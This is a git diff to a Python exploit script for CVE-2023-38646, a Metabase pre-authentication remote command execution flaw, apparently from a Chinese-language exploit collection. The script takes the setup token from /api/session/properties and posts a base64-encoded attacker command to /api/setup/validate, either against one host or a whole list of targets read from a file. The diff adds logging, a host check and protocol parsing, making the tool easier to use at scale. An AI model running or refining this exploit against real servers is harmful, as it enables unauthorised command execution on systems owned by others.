diff --git a/93-数据库专区/02-Metabase/CVE-2023-38646/cve-2023-38646.py b/93-数据库专区/02-Metabase/CVE-2023-38646/cve-2023-38646.py
index 358dee6..ab1ff67 100644
--- a/93-数据库专区/02-Metabase/CVE-2023-38646/cve-2023-38646.py
+++ b/93-数据库专区/02-Metabase/CVE-2023-38646/cve-2023-38646.py
@@ -4,21 +4,35 @@
 import argparse
 import requests
 import base64
+import logging
+
+logging.basicConfig(level=logging.INFO,
+                    format='[%(asctime)s.%(msecs)03d] [%(levelname)s] : %(message)s',
+                    )
+
+
+def check_host(host):
+    if host is None:
+        return False
+    if len(host) > 0:
+        return True
+    else:
+        return False
 
 
 def exploit(host, port, cmd, protocol='http://'):
     global setup_token
-    target =protocol+ host + ':' + port
-    print(f'Attacking {target}')
+    target = protocol + host + ':' + port
+    logging.info(f'[+] Attacking {target} ...')
     url = target + '/api/session/properties'
     step_one = requests.get(url, verify=False)
     result = step_one.json()
     try:
         setup_token = result['setup-token']
     except KeyError as e:
-        print("setup-token missed")
+        logging.error("setup-token missed")
         exit(0)
-    print(f'[+] setup-token={setup_token}')
+    logging.debug(f'[+] setup-token={setup_token}')
 
     check_url = target + '/api/setup/validate'
     response = requests.post(check_url, timeout=3,
@@ -44,16 +58,17 @@ def exploit(host, port, cmd, protocol='http://'):
                                  },
                              }
                              )
-    print(f'[+] Server response:\n{response.text}')
+    logging.debug(f'[+] Server response: {response.text}')
+    logging.info(f'[+] Server resp code: {response.status_code}')
 
 
 if __name__ == '__main__':
     parser = argparse.ArgumentParser(description='exp for cve-2023-38346')
-    parser.add_argument('--host', help='输入目标ip')
-    parser.add_argument('--file', help='输入包含目标的文件')
-    parser.add_argument('--port', default='3000', help='输入目标端口，默认为 3000')
-    parser.add_argument('--cmd', type=str, required=True, help='输入目标ip')
     parser.add_argument('--protocol', type=str, default='http', help='输入目标协议，http或https')
+    parser.add_argument('--host', help='输入目标ip')
+    parser.add_argument('--port', default='3000', help='输入目标端口，默认为 3000')
+    parser.add_argument('--file', help='输入包含目标的文件')
+    parser.add_argument('--cmd', type=str, required=True, help='输入目标ip')
 
     args = parser.parse_args()
     protocol = args.protocol
@@ -74,6 +89,8 @@ if __name__ == '__main__':
         with open(host_file, 'r') as f:
             for temp_host in f:
                 temp_host = temp_host.rstrip('\n')
+                if '://' in temp_host:
+                    protocol = temp_host.split('://')[0] + '://'
                 if ':' in temp_host:
                     host = temp_host.split(':')[0]
                     port = temp_host.split(':')[1]
@@ -81,14 +98,18 @@ if __name__ == '__main__':
                     host = temp_host
                     port = '3000'
                 try:
-                    exploit(host, port, b64_cmd, protocol)
+                    if check_host(host):
+                        exploit(host, port, b64_cmd, protocol)
                 except Exception as e:
-                    print(f'Connection error:\n{e}')
+                    print(f'[-] Connection error:\n{e}')
+                    continue
+
     else:
         host = args.host
         port = args.port
 
         try:
-            exploit(host, port, b64_cmd, protocol)
+            if check_host(host):
+                exploit(host, port, b64_cmd, protocol)
         except Exception as e:
-            print(f'Connection error:\n{e}')
+            logging.error(f'[-] Connection error:\n{e}')